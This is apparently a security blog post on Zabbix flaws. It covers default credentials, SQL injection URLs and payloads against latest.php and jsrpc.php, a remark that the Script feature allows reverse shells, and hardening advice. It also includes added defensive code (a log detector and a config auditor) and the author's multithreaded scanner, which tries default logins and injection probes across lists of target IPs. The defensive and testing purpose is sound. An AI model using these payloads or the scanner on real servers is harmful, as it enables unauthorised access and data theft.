I. Zabbix:
Zabbix is an enterprise-grade, open-source solution that provides distributed system monitoring and network monitoring through a web interface. Zabbix can monitor a wide range of network parameters to keep server systems running securely, and it provides a flexible notification mechanism so that system administrators can quickly locate and resolve problems.
II. Zabbix vulnerabilities:
1. Weak passwords:
WeakPassword = [("admin", "zabbix"), ("Admin", "zabbix"), ("guest", "")]
2. SQL injection
(1)
Title: SQL injection via the toggle_ids[] parameter in latest.php
Precondition: authenticated (after login)
Impact: can lead to system-level access
URL and payload:
http://a.b.c.d/latest.php?output=ajax&sid=<last 16 characters of the session id obtained after login>&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
(2)
Title: SQL injection via the profileIdx2 parameter in jsrpc.php
Precondition: no login required; alternatively, after logging in, substitute a high-privilege sid and cookie
Impact: the usual impact of SQL injection
URL and payload:
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
(3)
Title: other SQL injection vulnerabilities: the itemid and periods parameters of chart_bar.php; the applications parameter of httpmon.php
Precondition: unknown
Impact: unknown
URL and payload: try generic SQL injection payloads
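From the defender's side, the three injection points above share one property: the affected parameters (toggle_ids[], profileIdx2, itemid, periods, applications) should only ever carry numbers or identifiers, so SQL syntax in them is a reliable signal in web-server logs. The following is an added example, not part of the original post, that decodes the query string of combined-format access log lines and flags requests whose sink parameters contain SQL indicators. The log lines, the log-format regex, the indicator list and the function names are my own constructions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Zabbix scripts and the query parameters the post names as injection sinks
SINK_PARAMS = {
    "latest.php": {"toggle_ids[]"},
    "jsrpc.php": {"profileIdx2"},
    "chart_bar.php": {"itemid", "periods"},
    "httpmon.php": {"applications"},
}

# what a value that should be a plain number or identifier must never contain
SQL_INDICATORS = re.compile(
    r"\bselect\b|\bunion\b|\bupdatexml\b|\bextractvalue\b|\bor\b\s+\d+\s*=\s*\d+|['\"()]|--|#",
    re.IGNORECASE,
)

# Apache/nginx combined log format: client ip ... "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# constructed sample access log lines (combined format), not taken from any real system
SAMPLE_LOG = """\
10.0.0.5 - - [17/Aug/2016:05:06:32 +0000] "GET /zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600 HTTP/1.1" 200 512
10.0.0.7 - - [17/Aug/2016:05:07:01 +0000] "GET /zabbix/jsrpc.php?type=9&method=screen.get&profileIdx=web.item.graph&profileIdx2=2&updateProfile=true HTTP/1.1" 200 341
10.0.0.9 - - [17/Aug/2016:05:08:14 +0000] "GET /zabbix/latest.php?output=ajax&sid=0bcd4ade648214dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385);%20select%20*%20from%20users%20where%20(1=1 HTTP/1.1" 200 88
10.0.0.9 - - [17/Aug/2016:05:08:20 +0000] "GET /zabbix/latest.php?output=ajax&sid=0bcd4ade648214dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385 HTTP/1.1" 200 88
10.0.0.11 - - [17/Aug/2016:05:09:00 +0000] "GET /zabbix/index.php HTTP/1.1" 200 1200
"""


def inspect_request(target):
    """Return [(parameter, decoded value), ...] for sink parameters that carry SQL, else []."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    sinks = SINK_PARAMS.get(script)
    if not sinks:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name not in sinks:
            continue
        # parse_qsl already decoded once; decode again so double-encoded payloads are seen too
        decoded = unquote_plus(value)
        if SQL_INDICATORS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_access_log(log_text):
    """Return (client ip, script, [parameter names]) for every request that looks injected."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = inspect_request(m.group("target"))
        if hits:
            script = urlsplit(m.group("target")).path.rsplit("/", 1)[-1]
            findings.append((m.group("ip"), script, [name for name, _ in hits]))
    return findings


if __name__ == "__main__":
    for ip, script, params in scan_access_log(SAMPLE_LOG):
        print("suspicious request from %s to %s via %s" % (ip, script, ", ".join(params)))
```

Only the named sink parameters are inspected, so a legitimate `profileIdx=web.item.graph` or a hex `sid` never trips the rule; run over the constructed lines it reports the jsrpc.php request from 10.0.0.5 and the first latest.php request from 10.0.0.9 and nothing else.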
3. OS command injection / execution:
(1) After logging in with a weak password, the Script feature built into Zabbix can be used to execute system commands, for example to spawn a reverse shell.
(2) Defence:
# Do not set AllowRoot=1; avoid starting the agent and server as root.
# Forbid the agent from executing system.run: do not set EnableRemoteCommands=1.
# Apply patches promptly.
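The two configuration points above can be audited mechanically. The following is an added example, not part of the original post, that parses zabbix_agentd.conf / zabbix_server.conf style text and reports whether AllowRoot or EnableRemoteCommands is switched on, treating an absent or commented-out line as the daemon default of 0. The two sample configurations, the parser's simplifications (only whole-line '#' comments, last duplicate wins, Include= not followed) and the function names are my own assumptions.

```python
import sys

# Parameters the post's defence list says not to enable, keyed by name.
# Value: (daemon default when the line is absent, why it matters). Both default to 0.
RISKY_SETTINGS = {
    "AllowRoot": ("0", "agent/server keeps running as root when started by root"),
    "EnableRemoteCommands": ("0", "server can make the agent execute system.run[...] commands"),
}

# constructed sample: an exposed agent configuration with both risky settings enabled
WEAK_CONF = """\
LogFile=/tmp/zabbix_agentd.log
Server=192.0.2.10
AllowRoot=1
EnableRemoteCommands=1
"""

# constructed sample: AllowRoot left at its commented-out default, remote commands disabled explicitly
HARDENED_CONF = """\
LogFile=/tmp/zabbix_agentd.log
Server=192.0.2.10
# AllowRoot=0
EnableRemoteCommands=0
"""


def parse_zabbix_conf(text):
    """Parse Key=Value configuration text into a dict.

    Simplifications (assumptions of this example): a line whose first non-blank
    character is '#' is a comment, a key given more than once keeps its last value,
    and Include= lines are stored but the referenced files are not read.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def audit_zabbix_conf(text):
    """Return [(key, effective value, reason)] for each risky setting that is switched on."""
    settings = parse_zabbix_conf(text)
    findings = []
    for key, (default, reason) in RISKY_SETTINGS.items():
        effective = settings.get(key, default)  # absent or commented out -> daemon default
        if effective == "1":
            findings.append((key, effective, reason))
    return findings


if __name__ == "__main__":
    # usage: python zabbix_conf_audit.py /etc/zabbix/zabbix_agentd.conf  (falls back to the samples)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "r") as fh:
            sources = [(sys.argv[1], fh.read())]
    else:
        sources = [("WEAK_CONF", WEAK_CONF), ("HARDENED_CONF", HARDENED_CONF)]
    for label, conf in sources:
        findings = audit_zabbix_conf(conf)
        if not findings:
            print("%s: no risky settings enabled" % label)
        for key, value, reason in findings:
            print("%s: %s=%s (%s)" % (label, key, value, reason))
```

Run against the two samples it reports both settings for WEAK_CONF and nothing for HARDENED_CONF; the same check applies to zabbix_server.conf, where AllowRoot has the same meaning.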
4. A Python check script I wrote myself; if there are problems, roast me
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
This Python Script Is For "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
"""

# import lib files
import os
import sys
import time
import logging
import datetime
import requests
import threading
from bs4 import BeautifulSoup
from optparse import OptionParser

# global variables define
ZabbixTarget = None  # target ip address!
ZabbixFile = None  # target ip address file
# strings that mean the login attempt bounced back to the login form
BlackList = [
    'incorrect',
    '<!-- Login Form -->'
]
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'

# global config set
logging.basicConfig(level=logging.INFO, format='%(message)s')


# global function defines:
def Config_Init():
    """
    Take "http://" to the ip address to create targeturl!
    """
    if ZabbixTarget:
        return ["http://%s" % ZabbixTarget]
    elif ZabbixFile:
        targetlist = []
        with open(ZabbixFile, "r") as fr:
            for line in fr:
                # one target per line; keep the first token, skip blank lines
                ip = line.strip().split(" ")[0]
                if ip:
                    targetlist.append("http://%s" % ip)
        return targetlist
    else:
        return []


def get_post_data(page_content):
    """
    from response html get post data!
    """
    postdata = {}
    soup = BeautifulSoup(page_content, "html.parser")
    for inputparameter in soup.find_all('input'):
        if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
            postdata[inputparameter['name']] = inputparameter['value']
    return postdata


def report_file_allinone():
    """merge the per-thread result files into one csv report and delete them"""
    vulnlist = []
    for parents, dirs, filenames in os.walk("./"):
        for filename in filenames:
            if filename.find("zabbix_vulnscan_result") >= 0:
                path = os.path.join(parents, filename)
                with open(path, "r") as fr:
                    vulnlist.extend(fr.readlines())
                os.remove(path)
    with open("zabbix_vuln_report_%s.csv" % str(datetime.date.today()), "w") as fw:
        fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
        for line in vulnlist:
            fw.write(line)


# Zabbix Scan Class Defines
class ZabbixScan:
    def __init__(self, targetlist):
        """
        #class column init!
        VulnExpPHPFile:
        //0-login-weakpassword
        //1-httpmon.php parameter->applications
        //2-chart_bar.php parameter->itemid
        //3-jsrpc.php parameter->profileIdx2
        //4-latest.php parameter->toggle_ids[]
        //5-OS_Injection->When you login the system you can run you scripts!
        TestTarget:
        //0-login-weakpassword
        //1-jsrpc.php
        //2-latest.php
        """
        self._weakpassword = [{"username": "Admin", "password": "zabbix"},
                              {"username": "admin", "password": "zabbix"},
                              {"username": "guest", "password": ""}]  # default password dictionary!
        self._targetlist = targetlist  # wait for scan target!
        self._size = len(self._targetlist)  # size of scan target!
        self._sqlinjectionurl1_vulnlist = []  # (target, user, pswd) tuples
        self._sqlinjectionurl2_vulnlist = []  # target urls
        self._login_weakpassword_vulnlist = []  # (target, user, pswd) tuples
        self._login_weakpassword_safelist = []

    def __len__(self):
        """return size of targetlist"""
        return self._size

    def _login(self, request, target, user, pswd):
        """fetch the login page, fill in the form and post it; returns the response or None"""
        headers = {'User-Agent': USER_AGENT}
        try:
            response = request.get(target, headers=headers, timeout=3)
        except Exception:
            return None
        if response.status_code != 200:
            return None
        postdata = get_post_data(response.content)
        headers["Referer"] = target
        postdata["user"] = user
        postdata["password"] = pswd
        try:
            return request.post(target + "/index.php", headers=headers, data=postdata, timeout=3)
        except Exception:
            return None

    def _scan_default_password_login(self):
        for authinfo in self._weakpassword:
            user = authinfo["username"]
            pswd = authinfo["password"]
            for target in self._targetlist:
                logging.info("[*] Target:%s Payload:%s" % (str(target), str(authinfo)))
                request = requests.session()
                response = self._login(request, target, user, pswd)
                request.close()
                if response is None:
                    self._login_weakpassword_safelist.append(target)
                    continue
                text = response.text
                # logged in only if the dashboard script marker is present and no login-form marker is
                if "chkbxRange.init();" in text and not any(flag in text for flag in BlackList):
                    self._login_weakpassword_vulnlist.append((target, user, pswd))
                else:
                    self._login_weakpassword_safelist.append(target)

    def _sqlinjectionurl1_scan(self):
        logging.info("[*] latest.php sqlinjection scan!")
        for vulntarget in self._login_weakpassword_vulnlist:
            target, user, pswd = vulntarget
            request = requests.session()
            response = self._login(request, target, user, pswd)
            if response is None:
                request.close()
                continue
            # the sid used by latest.php is the last 16 chars of the session cookie
            cookievalues = list(request.cookies.values())
            if not cookievalues:
                request.close()
                continue
            sessionid = cookievalues[0][-16:]
            # '%' inside the probe string is doubled so the format operator leaves it alone
            scanurl = target + ("/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1"
                                "&toggle_ids[]=1%%^&*%%22%%27()-*#" % str(sessionid))
            try:
                response = request.get(scanurl, timeout=20)
            except Exception:
                request.close()
                continue
            if "SQL syntax" in response.text:
                self._sqlinjectionurl1_vulnlist.append(vulntarget)
            request.close()

    def _sqlinjectionurl2_scan(self):
        logging.info("[*] jsrpc.php sqlinjection scan!")
        for vulntarget in self._targetlist:
            scanurl = vulntarget + ("/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083"
                                    "&pageFile=history.php&profileIdx=web.item.graph"
                                    "&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23"
                                    "&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17")
            headers = {'User-Agent': USER_AGENT}
            try:
                response = requests.get(scanurl, headers=headers, timeout=20)
            except Exception:
                continue
            # updatexml() echoes the md5 value back inside the XPATH syntax error
            if "ed733b8d10be255eceba344d533586" in response.text:
                self._sqlinjectionurl2_vulnlist.append(vulntarget)

    def scan_run(self):
        self._scan_default_password_login()
        self._sqlinjectionurl1_scan()
        self._sqlinjectionurl2_scan()


class scanthread(threading.Thread):
    def __init__(self, threadname, targetlist):
        threading.Thread.__init__(self, name=threadname)
        self.scanner = ZabbixScan(targetlist)
        self.targetlist = targetlist

    def _create_csv(self):
        scantime = str(datetime.datetime.now())
        with open("zabbix_vulnscan_result_%s_%s" % (str(time.time()), str(self.name)), "w") as fw:
            for vuln in self.scanner._login_weakpassword_vulnlist:
                target = vuln[0].split("http://")[-1]
                fw.write("%s,%s,%s\n" % (target, "weakpassword", scantime))
            for vuln in self.scanner._sqlinjectionurl1_vulnlist:
                target = vuln[0].split("http://")[-1]
                fw.write("%s,%s,%s\n" % (target, "latest.php-SQLI", scantime))
            # jsrpc.php results are plain target urls, not (target, user, pswd) tuples
            for vuln in self.scanner._sqlinjectionurl2_vulnlist:
                target = vuln.split("http://")[-1]
                fw.write("%s,%s,%s\n" % (target, "jsrpc.php-SQLI", scantime))

    def run(self):
        self.scanner.scan_run()
        self._create_csv()


if __name__ == "__main__":
    logging.info("[+]*****************************************************************[+]")
    logging.info("Zabbix Scan Init!")
    parser = OptionParser()
    parser.add_option("-i", "--iptarget", dest="iptarget", help="Target IP address!")
    parser.add_option("-f", "--iptargetfile", dest="iptargetfile", help="Target IPs file!")
    parser.add_option("-t", "--threadnum", dest="threadnum", help="Number of Added Threads to Scan!")
    (options, args) = parser.parse_args()
    parameterchecklist = [options.iptarget, options.iptargetfile]
    if parameterchecklist in [[None, None], [None, ""], ["", None], ["", ""]]:
        logging.error("[-] Target parameters error!")
        sys.exit(0)
    try:
        options.threadnum = 1 if options.threadnum in (None, "") else int(options.threadnum)
    except Exception:
        logging.error("[-] Threadnum parameter error!")
        sys.exit(0)
    [ZabbixTarget, ZabbixFile] = parameterchecklist
    logging.info("[+] Scan Config Init!")
    targetlist = Config_Init()
    targetsize = len(targetlist)
    logging.info("[+] Scan Target Number:%s" % str(targetsize))
    logging.info("[+] Scan Threads Init")
    # integer chunk size, never 0 (more threads than targets would otherwise loop forever)
    threadtargetsize = max(1, targetsize // options.threadnum)
    threadlist = []
    for nameflag, start in enumerate(range(0, targetsize, threadtargetsize)):
        threadname = "scan-thread-%s" % str(nameflag)
        threadlist.append(scanthread(threadname, targetlist[start:start + threadtargetsize]))

    logging.info("[+] Scan Thread Start!")
    for thread in threadlist:
        thread.start()
        time.sleep(2)
        logging.info("[+] %s --Start!" % thread.name)
    for thread in threadlist:
        thread.join()
    logging.info("[+] Scan Finished!")
    logging.info("[+] Report Creating!")
    report_file_allinone()
    logging.info("[+] Report Create!")
    sys.exit(0)